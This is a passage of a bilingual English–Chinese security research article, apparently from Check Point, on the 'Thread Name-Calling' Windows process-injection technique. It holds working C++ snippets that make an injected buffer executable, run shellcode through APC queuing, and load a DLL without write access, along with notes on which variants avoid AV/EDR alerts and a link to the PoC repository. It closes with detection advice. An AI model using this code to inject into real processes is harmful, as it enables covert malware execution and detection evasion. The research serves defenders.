分配新缓冲区是最干净的选项,但它也有一些缺点。要从远程进程执行此操作,我们必须使用 RWX 访问权限调用 VirtualAllocEx
– 这很可疑。通过 APC 远程调用 VirtualAlloc
是不可能的:此函数有 4 个参数,而使用 APC 的 API 时,我们只能传递 3 个参数。
An alternative is to use the buffer that we already have (allocated on the heap), and just change its memory protection. We can do it by calling VirtualProtectEx
. Changing the memory protection of the page within the remote process is still suspicious, but the advantage of this method is that it requires fewer steps than the one presented earlier. Again, calling the local equivalent of the function: VirtualProtect
remotely has the same problems as calling VirtualAlloc
.
另一种方法是使用我们已经拥有的缓冲区(在堆上分配),并更改其内存保护。我们可以通过调用 VirtualProtectEx
来实现。在远程进程中更改页面的内存保护仍然值得怀疑,但这种方法的优点是它需要的步骤比前面介绍的步骤少。同样,远程调用函数的本地等效项 VirtualProtect
与调用 VirtualAlloc
存在相同的问题。
Still, there exists a possibility to do the memory protection or allocation by calling VirtualAlloc
/VirtualProtect
remotely with the help of ROP (included as one of the options in our PoC code). But this method comes with its own problems, and a different set of suspicious indicators. It requires using API for direct thread manipulation (SuspendThread
/ResumeThread
, SetThreadContext
/GetThreadContext
). According to the tests we performed, that raises even more alerts, and will result in our injector being flagged by many AV/EDR products. In addition, allocating executable memory from within the process will fail if it has the DCP (Dynamic Code Prohibited) enabled.
尽管如此,仍有可能在 ROP(作为 PoC 代码中的选项之一)的帮助下通过远程调用 VirtualAlloc
/VirtualProtect
来执行内存保护或分配。但这种方法有其自身的问题,以及一组不同的可疑指标。它需要使用 API 进行直接线程操作(SuspendThread
/ResumeThread
、SetThreadContext
/GetThreadContext
)。根据我们执行的测试,这会引发更多警报,并将导致我们的喷油器被许多 AV/EDR 产品标记。此外,如果进程启用了 DCP(禁止动态代码),则从进程内部分配可执行内存将失败。
After considering all the pros and cons, we decided to keep things simple and just call VirtualProtectEx
. The second snippet illustrates the alternative version, with VirtualAllocEx
.
在考虑了所有的优缺点之后,我们决定让事情变得简单,直接调用 VirtualProtectEx
。第二个代码片段说明了具有 VirtualAllocEx
的替代版本。
Once our shellcode is in the executable memory region, we are ready to run it. We use another APC to trigger the execution (requires a thread handle with THREAD_SET_CONTEXT
access). Additionally, we may use aforementioned function, RtlDispatchAPC
, as a proxy to call the injected code.
一旦我们的 shellcode 位于可执行内存区域,我们就可以运行它了。我们使用另一个 APC 来触发执行(需要具有 THREAD_SET_CONTEXT
访问权限的线程句柄)。此外,我们可以使用上述函数 RtlDispatchAPC
作为代理来调用注入的代码。
Snippet illustrating the basic implementation:
说明基本实现的代码段:
bool run_injected_v1(HANDLE hProcess, void* remotePtr, size_t payload_len) { DWORD oldProtect = 0; if (!VirtualProtectEx(hProcess, remotePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) { std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n"; return false; } HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT); if (!hThread || hThread == INVALID_HANDLE_VALUE) { std::cerr << "Invalid thread handle!\n"; return false; } bool isOk = false; auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC; if (_RtlDispatchAPC) { if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) { isOk = true; } } CloseHandle(hThread); return isOk; }
Extended version, covering different possibilities:
扩展版本,涵盖不同可能性:
bool run_injected(HANDLE hProcess, void* remotePtr, size_t payload_len) { void* shellcodePtr = remotePtr; #ifdef USE_EXISTING_THREAD HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT); #else HANDLE hThread = create_alertable_thread(hProcess); #endif if (!hThread || hThread == INVALID_HANDLE_VALUE) { std::cerr << "Invalid thread handle!\n"; return false; } #ifdef USE_NEW_BUFFER shellcodePtr = VirtualAllocEx(hProcess, nullptr, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (!shellcodePtr) { std::cout << "Failed to allocate!" << std::hex << GetLastError() << "\n"; return false; } std::cout << "Allocated: " << std::hex << shellcodePtr << "\n"; void* _RtlMoveMemoryPtr = GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlMoveMemory"); if (!_RtlMoveMemoryPtr) { std::cerr << "Failed retrieving: _RtlMoveMemoryPtr\n"; return false; } if (!queue_apc_thread(hThread, _RtlMoveMemoryPtr, shellcodePtr, remotePtr, (void*)payload_len)) { return false; } std::cout << "Added RtlMoveMemory to the thread queue!\n"; #else DWORD oldProtect = 0; if (!VirtualProtectEx(hProcess, shellcodePtr, payload_len, PAGE_EXECUTE_READWRITE, &oldProtect)) { std::cout << "Failed to protect!" << std::hex << GetLastError() << "\n"; return false; } std::cout << "Protection changed! Old: " << std::hex << oldProtect << "\n"; #endif bool isOk = false; auto _RtlDispatchAPC = GetProcAddress(GetModuleHandle("ntdll.dll"), MAKEINTRESOURCE(8)); //RtlDispatchAPC; if (_RtlDispatchAPC) { std::cout << "Using RtlDispatchAPC\n"; if (queue_apc_thread(hThread, _RtlDispatchAPC, shellcodePtr, 0, (void*)(-1))) { isOk = true; } } else { if (queue_apc_thread(hThread, shellcodePtr, 0, 0, 0)) { isOk = true; } } if (isOk) std::cout << "Added to the thread queue!\n"; #ifndef USE_EXISTING_THREAD ResumeThread(hThread); #endif CloseHandle(hThread); return isOk; }
And it works! 而且它奏效了!
See in action 查看实际操作
Video demo: https://youtu.be/1BJaxHh91p4
视频演示:https://youtu.be/1BJaxHh91p4
As we found during our tests, although we call the potentially suspicious API (VirtualProtectEx
or VirtualAllocEx
), for most of the products this indicator alone was not enough to flag the payload: it is was not registered that we are using an injected buffer.
正如我们在测试中发现的那样,尽管我们调用了可能可疑的 API (VirtualProtectEx
或 VirtualAllocEx
),但对于大多数产品来说,仅此指标不足以标记有效负载:没有注册我们正在使用注入的缓冲区。
During our research, we assessed several different methods of making the injected buffer executable. Unfortunately, each of those methods has its flaws. The most straight-forward way is by the API that operates on the process, such as VirtualProtectEx
or VirtualAllocEx
– but, using those functions may draw unwanted attention. The alternative is calling functions VirtualProtect
or VirtualAlloc
remotely, via ROP – however, this involves a set of APIs that are even more suspicious, so we decided to stick with the simpler alternative.
在我们的研究过程中,我们评估了几种使注入的缓冲液可执行的不同方法。不幸的是,这些方法中的每一种都有其缺陷。最直接的方法是使用对进程进行操作的 API,例如 VirtualProtectEx
或 VirtualAllocEx
– 但是,使用这些函数可能会引起不必要的注意。另一种方法是通过 ROP 远程调用函数 VirtualProtect
或 VirtualAlloc
– 但是,这涉及一组更可疑的 API,因此我们决定坚持使用更简单的替代方案。
The presence of the page with RWX access rights is another indicator that will be quickly picked up by memory scanners. Using just a few more calls, we can easily implement a scenario where we allocate a new memory region with Read/Write access, copy there the injected buffer, and then change it to Read/eXecute. Also, once we have our code executed within the context of a remote process, nothing stops us from pivoting further, allocating additional memory within it (as long as the process does not use DCP policy), and moving the payload, changing the access rights back to the initial ones.
具有 RWX 访问权限的页面的存在是内存扫描程序会很快发现的另一个指标。只需再调用几次,我们就可以轻松实现这样一个场景:分配一个具有读/写访问权限的新内存区域,将注入的缓冲区复制到那里,然后将其更改为 Read/eXecute。此外,一旦我们在远程进程的上下文中执行了我们的代码,就没有什么能阻止我们进一步旋转,在其中分配额外的内存(只要该进程不使用 DCP 策略),并移动有效负载,将访问权限改回初始权限。
If needed, we can also further reduce access rights with which the process has to be opened, as described at the beginning of the chapter.
如果需要,我们还可以进一步减少必须打开进程的访问权限,如本章开头所述。
DLL injection is one of the well-known techniques of augmenting a running process with our code. It is not a particularly stealthy technique, because it calls LoadLibrary
on the payload (DLL) which has to be first dropped on the disk. In addition, the sole fact of loading a PE via standard API generates a kernel callback which can be used for detection. Nevertheless, it is one of the simple techniques that can be useful in some cases, and it is worthwhile to have in our arsenal.
DLL 注入是使用我们的代码增强正在运行的进程的众所周知的技术之一。它不是一种特别隐蔽的技术,因为它在有效负载 (DLL) 上调用 LoadLibrary
,而有效负载 (DLL) 必须首先放在磁盘上。此外,通过标准 API 加载 PE 的唯一事实会生成可用于检测的内核回调。尽管如此,它是在某些情况下有用的简单技术之一,值得在我们的武器库中拥有。
Typical implementation of DLL injection involves:
DLL 注入的典型实现包括:
VirtualAllocEx
– to allocate memory for a DLL path within the remote processVirtualAllocEx
– 为远程进程中的 DLL 路径分配内存WriteProcessMemory
– to write the path into the allocated memoryWriteProcessMemory
– 将路径写入分配的内存CreateRemoteThread
(or equivalents) – to call LoadLibrary
remotely (passing it the pointer to the written path). Some variants may involve running the LoadLibrary
via APC instead of the new thread.CreateRemoteThread
(或等效项)– 远程调用 LoadLibrary
(将指针传递给写入路径)。某些变体可能涉及通过 APC 而不是新线程运行 LoadLibrary
。In this section we propose an alternative implementation, that does not require write access right to the target process, and involves non-standard APIs:
在本节中,我们提出了一种替代实现,它不需要对目标进程的写入访问权限,并且涉及非标准 API:
SetThreadDescription
+ NtQueueApcThreadEx2
with GetThreadDescription
– for remote memory allocation + writing the path to the remote processSetThreadDescription
+ NtQueueApcThreadEx2
与 GetThreadDescription
– 用于远程内存分配 + 将路径写入远程进程NtQueueApcThreadEx2
– to call LoadLibrary
remotely (but of course we can also use a new thread, like in the classic implementation)NtQueueApcThreadEx2
– 远程调用 LoadLibrary
(当然,我们也可以使用新线程,就像在经典实现中一样)The first step can be implemented exactly as in the Thread Name-Calling implementation (described under: ”Remote write with the help of thread description”). Snippet:
第一步可以完全按照 Thread Name-Calling 实现来实现(如下所述:“在线程描述的帮助下进行远程写入”)。片段:
const wchar_t* buf = dllName.c_str(); void* remotePtr = get_peb_unused(hProcess); wchar_t* wPtr = pass_via_thread_name(hProcess, buf, remotePtr);
In contrast to Thread Name-Calling, we don’t have to change the access rights to our injected buffer, so the second step is very simple.
与 Thread Name-Call 相比,我们不必更改注入缓冲区的访问权限,因此第二步非常简单。
bool inject_with_loadlibrary(HANDLE hProcess, PVOID remote_ptr) { HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT); bool isOk = queue_apc_thread(hThread, LoadLibraryW, remote_ptr, 0, 0); CloseHandle(hThread); return isOk; }
See in action 查看实际操作
Video demo: https://youtu.be/8cSNgE3gZxY
视频演示:https://youtu.be/8cSNgE3gZxY
The described techniques were tested on Windows 10, and Windows 11. List of the tested versions:
所述技术已在 Windows 10 和 Windows 11 上进行了测试。测试版本列表:
Version 10.0.19045 Build 19045 (Windows 10 Enterprise, 64 bit) Version 10.0.22621 Build 22000 (Windows 11 Pro, 64 bit) Version 10.0.22621 Build 22621 (Windows 11 Pro, 64 bit - Windows 11 v22H2) Version 10.0.22631 Build 22631 (Windows 11 Pro, 64 bit - Windows 11 v23H2)
The intended target is a 64-bit process. The following mitigation policies may be set:
预期目标是 64 位进程。可以设置以下缓解策略:
DWORD64 MitgFlags = PROCESS_CREATION_MITIGATION_POLICY_CONTROL_FLOW_GUARD_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON // won't work with the version calling VirtualProtect/VirtualAlloc via ROP | PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON | PROCESS_CREATION_MITIGATION_POLICY2_MODULE_TAMPERING_PROTECTION_ALWAYS_ON ;
Thread Name-Calling won’t work on processes that have the following mitigation policy set:
线程名称调用不适用于设置了以下缓解策略的进程:
PROCESS_CREATION_MITIGATION_POLICY_WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON
The complete source code, containing the implementation of described techniques, can be found in the following repository:
完整的源代码(包含所述技术的实现)可以在以下存储库中找到:
https://github.com/hasherezade/thread_namecalling
As new APIs are added to Windows, new ideas for injection techniques are appearing. To implement effective detection we must always keep an eye on the changing landscape. Fortunately, Microsoft also works on implementing more visibility for anti-malware products, and currently most of the important APIs can be monitored with the help of ETW events.
随着新 API 添加到 Windows 中,注入技术的新想法不断出现。为了实施有效的检测,我们必须始终关注不断变化的环境。幸运的是,Microsoft 还致力于为反恶意软件产品实现更高的可见性,目前大多数重要的 API 都可以在 ETW 事件的帮助下进行监控。
Thread Name-Calling uses some of the relatively new APIs. However, it cannot avoid incorporating older well-known components, such as APC injections – APIs which should always be taken into consideration as a potential threat. Similarly, the manipulation of access rights within a remote process is a suspicious activity. However, even those indicators, when used out of the typical sequence of calls, may be overlooked by some of the AV and EDR products.
线程名称调用使用一些相对较新的 API。然而,它无法避免采用较旧的知名组件,例如 APC 注射 – 应始终被视为潜在威胁的 API。同样,在远程进程中操纵访问权限也是一种可疑活动。然而,即使是这些指标,当在典型的呼叫序列之外使用时,也可能会被一些 AV 和 EDR 产品所忽视。
Check Point customers remain protected from the threats described in this research.
Check Point 客户仍然受到保护,免受本研究中描述的威胁。
Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.
Check Point 的威胁仿真全面覆盖了攻击策略、文件类型和操作系统,并开发并部署了签名来检测和保护客户免受本研究中描述的威胁。
Check Point’s Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise. Behavioral Guard protections were developed and deployed to protect customers against the threats described in this research.
Check Point 的 Harmony Endpoint 以最高安全级别提供全面的端点保护,这对于避免安全漏洞和数据泄露至关重要。开发和部署了 Behavioral Guard 保护措施,以保护客户免受本研究中描述的威胁。
TE/Harmony Endpoint protections:
TE/Harmony Endpoint 保护:
Behavioral.Win.ImageModification.C
行为 .Win.ImageModification.C
Behavioral.Win.ImageModification.F
行为 Win.ImageModification.F
https://attack.mitre.org/techniques/T1055
https://twitter.com/Hexacorn/status/1317424213951733761
https://twitter.com/_Gal_Yaniv/status/1353630677493837825
https://blahcat.github.io/posts/2019/03/17/small-dumps-in-the-big-pool.html
https://gitlab.com/ORCA000/t.d.p
https://www.lodsb.com/shellcode-injection-using-threadnameinformation
https://modexp.wordpress.com/2019/08/27/process-injection-apc/
https://repnz.github.io/posts/apc/user-apc/#ntqueueapcthreadex-meet-special-user-apc
https://www.deepinstinct.com/blog/inject-me-x64-injection-less-code-injection